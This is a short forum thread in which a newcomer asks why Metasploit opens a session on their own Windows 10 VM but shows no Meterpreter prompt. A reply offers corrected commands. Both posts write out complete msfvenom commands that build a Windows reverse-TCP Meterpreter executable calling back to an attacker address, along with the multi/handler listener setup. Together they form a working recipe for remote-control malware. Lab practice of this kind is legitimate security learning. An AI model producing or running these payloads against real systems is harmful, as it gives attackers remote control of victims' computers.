Jump to content

Meterpreter console not opening


aideux

Recommended Posts

For some reason, I keep getting an issue where, when the victim double-clicks on the payload, a session is opened, but not the console that would allow me to use meterpreter. To create the payload, I use this code:

msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 -f exe LHOST=[attacker IP address] LPORT=5555 -o /root/Desktop/[filename].exe

Then, in the metasploit console, I type:

use multi/handler

set payload windows/meterpreter_reverse_tcp

set LHOST [attacker IP address]

set LPORT 5555

exploit

Then, a session is opened, but the line that looks like "meterpreter>" does not open.

I have tried using different ports, and have also attempted to use ngrok, which did not work. The system I am attacking is my own windows 10 VM. Can someone please help me out? I am new to using metasploit, and would love some advice.

Link to comment
Share on other sites

Try using this code instead. You will have to create a new payload above to match.

Quote

msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=(Attack IP) LPORT=(ATTACK PORT) -f exe -o "/root/Desktop/(filename).exe"

use exploit/multi/handler/

set payload windows/meterpreter/reverse_tcp

set LHOST (your ip address)

set LPORT (the same port you've set in the payload code)

exploit

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...